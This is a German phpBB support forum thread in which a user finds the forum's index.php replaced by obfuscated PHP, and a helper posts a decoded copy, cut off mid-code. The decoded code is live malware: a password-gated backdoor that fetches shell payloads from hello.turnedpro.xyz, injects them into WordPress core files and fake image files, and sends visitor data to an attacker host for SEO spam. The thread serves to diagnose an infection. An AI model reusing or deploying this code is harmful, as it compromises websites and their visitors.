[3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Fragen rund um die Installation, Administration und Benutzung von phpBB.
Forumsregeln
Bitte im Thementitel den Präfix deiner phpBB-Version angeben
Antworten
Maggan22
Mitglied
Beiträge: 392
Registriert: 24.01.2008 11:29
Kontaktdaten:

[3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Maggan22 »

Hallöchen zusammen,

ich habe ein phpbb3.3 forum (gehabt), mit einigen extentions, lief aber alles wunderbar. Ich war eine weile nicht mehr online (ca. 2 wochen) gehe auf meine Seite, Sieht alles aus wie immer, ich will mich einloggen erscheint
Forbidden You don't have permission to access this resource.
Aber erst nach dem einloggen.
Hab die chmod rechte geändert, Cache geleert - php Versionen durchprobiert nichts zu machen. Hab dann letztendlich gedacht, ok - machste ein update auf 3.4. Vorher war es die neueste 3.3 Version. Selbes Ergebnis. auch nochmal alles mögliche probiert - chmod, Cache etc. Aber alles war wie vorher. DANN bin ich hingegangen und hab das Backup vor dem Update auf einen anderen Webspace gezogen. Auch dort alles durchprobiert - selber Fehler.
Auch da das Update gemacht. DANN lief alles wieder. Konnte mich einloggen, schreiben - wie es sein sollte. Jetzt will ich mich nach ein paar Tagen einloggen. kommt erst eine weiße Seite. Hatte vom alten webspace eine weiterleitung gemacht, die hab ich entfernt, auf dem neuen Space eine Subdomain eingerichtet und die php Version auf 7.4 gestellt - Startseite erscheint. Nach dem einloggen aber wieder o.g. Fehler.

Geändert hatte ich nach dem letzten Update, nachdem es dann wieder lief, nichts mehr.

Achja, Alter Provider strato, neuer all-inkl.com - Update hab ich manuell gemacht - also alle files bis auf die üblichen gelöscht und die neuen, ausser die Config hochgeladen. Datenbankupdate... Nach empfohlener Methode. Falls das relevant ist.

Jetzt wären eure Glaskugeln gefragt... Was könnte es sein?
Gruss Maggan22
Benutzeravatar
Mike-on-Tour
Supporter
Supporter
Beiträge: 1063
Registriert: 13.01.2020 21:09
Kontaktdaten:

Re: [3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Mike-on-Tour »

Weiße Seite deutet auf einen PHP-Fehler hin, ist etwas im Error-Log hinterlegt? Wie du da dran kommst, kannst du hier nachlesen.

Wenn du im Error-Log etwas findest, bitte hier posten, damit die Glaskugel ein wenig vorgewärmt werden kann.
Maggan22
Mitglied
Beiträge: 392
Registriert: 24.01.2008 11:29
Kontaktdaten:

Re: [3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Maggan22 »

hm, also ich hab jetzt bei all inkl. eine errorlog file erstellt - anleitungen hab cih viele gefunden, aber es wird mir kein Fehler dort angezeigt.
Ich wollte einen künstlichen Fehler einbauen. Hab mir dafür die index.php ausgesucht und eine böse Überraschung erlebt.

Dort wurde mir nicht der Orginalcode von phpbb angezeigt, sondern folgendes:

Code: Alles auswählen

<?php $TElwixhXGb='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$TElwixhXGb[(105/15)].$TElwixhXGb[(26-1)].$TElwixhXGb[(1*49)].$TElwixhXGb[((10*1)+18)].$TElwixhXGb[(14+22)].$TElwixhXGb[(44+5)].$TElwixhXGb[(44-13)].$TElwixhXGb[(684/18)].$TElwixhXGb[(23+4)].$TElwixhXGb[(72-(33-7))].$TElwixhXGb[(154/22)].$TElwixhXGb[(11+25)].$TElwixhXGb[(65-(62-31))].$TElwixhXGb[(26-6)].$TElwixhXGb[((27*2)-8)];$pHFdNhg9688=$TElwixhXGb[(20-9)].$TElwixhXGb[(2*4)].$TElwixhXGb[(29*1)].$TElwixhXGb[(160/4)];$MYtraky2482=$TElwixhXGb[(8*5)].$TElwixhXGb[((1+0)+2)].$TElwixhXGb[(6+(1*(95/19)))].$TElwixhXGb[(140/5)].$TElwixhXGb[(522/18)].$TElwixhXGb[(7*((7-3)-2))].$TElwixhXGb[(2*14)].$TElwixhXGb[(138/(2+4))].$TElwixhXGb[(1029/(378/18))].$TElwixhXGb[((2*189)/9)].$TElwixhXGb[(12+(0+0))].$TElwixhXGb[(31*1)].$TElwixhXGb[(48/(36/12))].$TElwixhXGb[(735/15)].$TElwixhXGb[(0+7)].$TElwixhXGb[(18+2)].$TElwixhXGb[(18-(10/5))].$TElwixhXGb[(735/15)].$TElwixhXGb[(0+(2-(1*1)))].$TElwixhXGb[(16-(3+(36/(0+18))))].$TElwixhXGb[((167-23)/18)].$TElwixhXGb[(0+(18-9))].$TElwixhXGb[(1*3)].$TElwixhXGb[(11*(1+(0/(78/13))))].$TElwixhXGb[(2*7)].$TElwixhXGb[(29*(0+1))].$TElwixhXGb[(38-(8+9))].$TElwixhXGb[(15*2)].$TElwixhXGb[(45-11)].$TElwixhXGb[(1*46)].$TElwixhXGb[(1*(17+21))].$TElwixhXGb[(78/3)].$TElwixhXGb[(21+(77/11))].$TElwixhXGb[(22+14)].$TElwixhXGb[(343/(91/13))].$TElwixhXGb[(1*1)].$TElwixhXGb[(21-10)].$TElwixhXGb[(22+(12/2))].$TElwixhXGb[(180/20)].$TElwixhXGb[(3+((0+0)*1))].$TElwixhXGb[(686/(126/9))].$TElwixhXGb[(61-(32-8))].$TElwixhXGb[(476/17)].$TElwixhXGb[((4-0)+22)].$TElwixhXGb[(((23-(2*5))/13)-0)].$TElwixhXGb[(7+(84/21))].$TElwixhXGb[(28/2)].$TElwixhXGb[(9-0)].$TElwixhXGb[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>
Keine Ahnung was das ist, wie es dahingekommen ist - ich habe nichts mehr installiert oder sonstiges - ich vermute ein Virus?
Ich hatte ja den Webhoster gewechselt und dort nochmal einen manuelles Update gemacht - mitgeschleppt haben kann ich es eigentlich nicht.

Hab dann die orginal index.php eingespielt und die Startseite erscheint. Jetzt muss ich schauen ob und wo noch mehr Seiten betroffen sind.
Was meint Ihr zu dem Code?
Gruss Maggan22
Benutzeravatar
Mahony
Ehemaliges Teammitglied
Beiträge: 12178
Registriert: 17.11.2005 22:33
Wohnort: Ostfildern Kemnat
Kontaktdaten:

Re: [3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Mahony »

Hallo
Das ist Schadcode!
Hier mal die Übersetzte Version:

Code: Alles auswählen


<?php error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = 'mapss.xml';
$dt = 0;
$sitemap_file = 'sitemap';
$mapnum = 2000;
if (isset($_GET['dt'])) {
    $dt = $_GET['dt'];
}
$site = @$_GET['smsite'];
$jdir = '';
$http_web = 'http';
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
$smuri_tmp = smrequest_uri();
$uri_script = "";
if (strstr($smuri_tmp, ".php") && !$site) {
    $uri_arr = explode(".php", $smuri_tmp);
    $uri_script = $uri_arr[0] . ".php?";
    $smuri_tmp = $uri_arr[1];
    $smuri_tmp = str_replace("?", "/", $smuri_tmp);
}
if ($smuri_tmp == '') {
    $smuri_tmp = '/';
}
$s = 'b' . 'ase6' . '4_e' . 'ncode';
$smuri = $s($smuri_tmp);
function smrequest_uri() {
    if (isset($_SERVER['REQUEST_URI'])) {
        $smuri = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        } else {
            $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $smuri;
}
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    write();
    echo "write done!";
    exit();
}
$goweb = 'seo35-2.firstok.xyz';
$password = md5(md5(@$_GET['pd']));
if ($password == '5fbf36f6b1070aec65f00cb8e35c9cc4') {
    $add_content = @$_GET['mapname'];
    $action = @$_GET['action'];
    $domain = @$_GET['domain'];
    if ($domain) {
        $host = $domain;
    } else {
        $host = $_SERVER['HTTP_HOST'];
    }
    //$host = $_SERVER['HTTP_HOST'];
    $path = dirname(__FILE__);
    $file_path = $path . '/robots.txt';
    if (!$action) {
        $action = 'put';
    }
    if ($action == 'put') {
        if (strstr($add_content, '.xml')) {
            if (file_exists($file_path)) {
                $data = smoutdo($file_path);
            } else {
                $data = 'User-agent: *
Allow: /';
            }
            if (strstr($data, '/' . $add_content)) {
                echo '<br>sitemap already added!<br>';
            } else {
                if (is_https()) {
                    $data_new = trim($data) . "
" . 'Sitemap: https://' . $host . '/' . $add_content;
                } else {
                    $data_new = trim($data) . "
" . 'Sitemap: http://' . $host . '/' . $add_content;
                }
                //Sitemap: http://www.gudangsehat.com/mapindex.xml
                if (file_put_contents($file_path, $data_new)) {
                    echo '<br>ok<br>';
                } else {
                    echo '<br>file write false!<br>';
                }
            }
        } else {
            echo '<br>sitemap name false!<br>';
        }
    }
    if ($action == 'del') {
        if (file_exists($file_path)) {
            $data = smoutdo($file_path);
        } else {
            $data = '';
        }
        if (strstr($data, '/' . $add_content)) {
            if (is_https()) {
                $data_new = trim($data) . "
" . 'Sitemap: https://' . $host . '/' . $add_content;
            } else {
                $data_new = trim($data) . "
" . 'Sitemap: http://' . $host . '/' . $add_content;
            }
            if (file_put_contents($file_path, $data_new)) {
                echo '<br>ok<br>';
            } else {
                echo '<br>file write false!<br>';
            }
        } else {
            echo '<br>sitemap does not exist!<br>';
        }
    }
    exit;
}
function is_https() {
    if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}
$temp = @$_GET['smtemp'];
$id = @$_GET['smid'];
$page = @$_GET['smpage'];
$site = str_replace('/', '', $site);
$host = $_SERVER['HTTP_HOST'];
$clock = '';
$tempweb = @$_GET['tempweb'];
$tempweb = str_replace('/', '', $tempweb);
if ($tempweb) {
    $site = $tempweb[0] . $tempweb[1] . $tempweb[2];
    $temp = substr($tempweb, 3);
}
$lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"];
$lang = $s($lang);
$os = $_SERVER['HTTP_USER_AGENT'];
$os = $s($os);
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
    $urlshang = $s($urlshang);
} else {
    $urlshang = '';
}
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
    $clock = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
    $clock = $_SERVER['REMOTE_ADDR'];
}
$http_clock = '';
if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
    $http_clock = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
    $http_clock = getenv('HTTP_X_FORWARDED_FOR');
}
if (stristr($clock, ',')) {
    $clock_tmp = explode(",", $clock);
    $clock = $clock_tmp[0];
}
if (!isset($sitemap_file) || @$sitemap_file == '') {
    $sitemap_file = 'sitemap';
}
if (!isset($mapnum) || @$mapnum == '') {
    $sitemap_file = 2000;
}
if (preg_match('/^' . "\/" . $sitemap_file . '(_[1-5])?.xml$/i', $smuri_tmp, $uriarr)) {
    @header("Content-type: text/xml");
    if (isset($uriarr[1])) {
        $id = str_replace('_', '', $uriarr[1]);
    } else {
        $id = 100;
    }
    $ivmapid = 0;
    sitemap_out(z_sitemap($goweb, $id, $host, $dt, $ivmapid, $mapnum, $http_web), $host, $uri_script);
    exit();
}
function z_sitemap($goweb, $id, $host, $dt, $maptype, $map_num, $http_web = 'http', $filetype = 0, $map_splits_num = '', $temp = '', $dataNew = '') {
    $web = $http_web . '://' . $goweb . '/sitemapdtn.php?date=' . $id . '&temp=' . $temp . '&web=' . $host . '&xml=' . $dt . '&maptype=' . $maptype . '&filetype=' . $filetype . '&map_splits_num=' . $map_splits_num . '&map_num=' . $map_num . '&dataNew=' . $dataNew;
    return trim(smoutdo($web));
}
function sitemap_out($url, $host, $uri_script) {
    if (is_https()) {
        $http = 'https';
    } else {
        $http = 'http';
    }
    $date_str = date("Y-m-d\TH:i:sP", time());
    $sitemap_header = '<?xml version="1.0" encoding="UTF-8"?>
<urlset
      xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
            http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">';
    $sitemap_header.= '
  <url>
    <loc>' . $http . '://' . $host . "/" . '</loc>
    <lastmod>' . $date_str . '</lastmod>
    <changefreq>daily</changefreq>
    <priority>0.1</priority>
  </url>';
    $url_arr = explode("
", $url);
    $map_str = $sitemap_header;
    foreach ($url_arr as $value) {
        $map_str.= '
  <url>
    <loc>' . $http . '://' . $host . "/" . $value . '</loc>
    <lastmod>' . $date_str . '</lastmod>
    <changefreq>daily</changefreq>
    <priority>0.1</priority>
  </url>';
    }
    if ($uri_script != "") {
        $map_str = str_replace($host . "/", $host . $uri_script, $map_str);
    }
    echo $map_str . "
</urlset>";
}
function get($url) {
    $contents = @file_get_contents($url);
    if (!$contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $contents = curl_exec($ch);
        curl_close($ch);
    }
    return $contents;
}
function write() {
    $write1 = get("http://hello.turnedpro.xyz/write1.txt");
    $write2 = get("http://hello.turnedpro.xyz/write2.txt");
    $shell_postfs = get("http://hello.turnedpro.xyz/mm1.txt");
    $shell_load = get("http://hello.turnedpro.xyz/mm2.txt");
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents("index.php");
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/font-editor.php";
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    file_put_contents("css/load.php", $shell_load);
    if (is_dir("wp-includes/SimplePie")) {
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
        file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
        file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
        file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
        $loader_content = file_get_contents($loader_php);
        $load_content = file_get_contents($load_php);
        @chmod($loader_php, 0755);
        @chmod($load_php, 0755);
        file_put_contents($loader_php, $write1 . $loader_content);
        file_put_contents($load_php, $load_content . $write2);
        @chmod($loader_php, 0644);
        @chmod($load_php, 0644);
        file_put_contents($font_editor_php, $shell_postfs);
    }
}
if (stristr($smuri_tmp, '.css')) {
    $web = $http_web . '://' . $goweb . '/index.php?url=' . $site . '&id=' . $id . '&temp=' . $temp . '&dt=' . $dt . '&web=' . $host . '&zz=' . smisbot() . '&jdir=' . $jdir . '&clock=' . $clock . '&uri=' . $smuri . '&lang=' . $lang . '&os=' . $os . '&urlshang=' . $urlshang . '&http_clock=' . $http_clock;
    $html_content = trim(smoutdo($web));
    if (!strstr($html_content, 'nobotuseragent')) {
        if (strstr($html_content, 'okhtmlgetcontent')) {
            @header("Content-type: text/css; charset=utf-8");
            $html_content = str_replace("okhtmlgetcontent", '', $html_content);
            echo $html_content;
            exit();
        } else if (strstr($html_content, 'getcontent500page')) {
            @header('HTTP/1.1 500 Internal Server Error');
            exit();
        } else if (strstr($html_content, 'getcontent404page')) {
            @header('HTTP/1.1 404 Not Found');
            exit();
        }
    }
} else if ($site) {
    if ($site == 'xml') {
        @header("Content-type: text/html; charset=utf-8");
        $mapdir = @$_GET['mapdir'];
        $maptype = @$_GET['maptype'];
        $filetype = @$_GET['filetype'];
        $map_splits_num = @$_GET['map_splits_num'];
        $map_num = @$_GET['map_num'];
        $dataNew = @$_GET['dataNew'];
        if ($mapdir) {
            if (!is_dir($mapdir)) {
                @mkdir($mapdir, 0777, true);
                echo 'ok ' . $mapdir . ' success!<br>';
            } else {
                echo $mapdir . ' already exist!<br>';
            }
        }
        if (@$_GET['mapindex']) {
            $filearray = listDir($mapdir);
            if (count($filearray) >= 2) {
                $mapindex_str = '';
                $mapindex_str = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.google.com/schemas/sitemap/0.84">';
                foreach ($filearray as $value) {
                    if (stristr($value, '.xml')) {
                        $mapindex_str.= '
  <sitemap>
    <loc>' . "http://" . $_SERVER['HTTP_HOST'] . "/" . $mapdir . '/' . $value . '</loc>
  </sitemap>';
                    }
                }
                $mapindex_str.= '
</sitemapindex>';
                $xmlname = @$_GET['mapindex'] . '.xml';
                $myfile = fopen($xmlname, "w");
                fwrite($myfile, $mapindex_str);
                fclose($myfile);
                echo "ok<br>http://" . $_SERVER['HTTP_HOST'] . "/" . $xmlname;
                //echo "<br>".$web;
                exit;
            } else {
                echo 'xml file less number mapindex faile!';
                exit;
            }
        }
        $web = $http_web . '://' . $goweb . '/sitemap.php?date=' . $id . '&temp=' . $temp . '&web=' . $host . '&xml=' . $dt . '&maptype=' . $maptype . '&filetype=' . $filetype . '&map_splits_num=' . $map_splits_num . '&map_num=' . $map_num . '&dataNew=' . $dataNew . '&uri=' . $smuri . '&http=' . $http;
        if (substr($temp, 0, 8) == 'shellxml') {
            $xmlname = substr($temp, 8) . '.xml';
        }
        if (substr($temp, 0, 7) == 'hackxml') {
            if (substr($temp, 7)) {
                $xmlname = substr($temp, 7) . '.xml';
            }
        }
        if (@$_GET['mapdir']) {
            if ($filetype == 1) {
                $xmlname = $xmlname . '.gz';
            } else if ($filetype == 2) {
                if (function_exists('gzopen')) {
                    $xmlname = $xmlname . '.gz';
                    if ($fp = gzopen($mapdir . '/' . $xmlname, 'w9')) {
                        $xml = trim(smoutdo($web));
                        if (stristr($xml, 'no creat map')) {
                            echo '<font style="color:red">no creat map!</font>';
                            exit;
                        }
                        $fp = gzopen($mapdir . '/' . $xmlname, 'w9');
                        gzwrite($fp, $xml);
                        gzclose($fp);
                        echo "ok<br>" . $http . "://" . $_SERVER['HTTP_HOST'] . "/" . $mapdir . '/' . $xmlname;
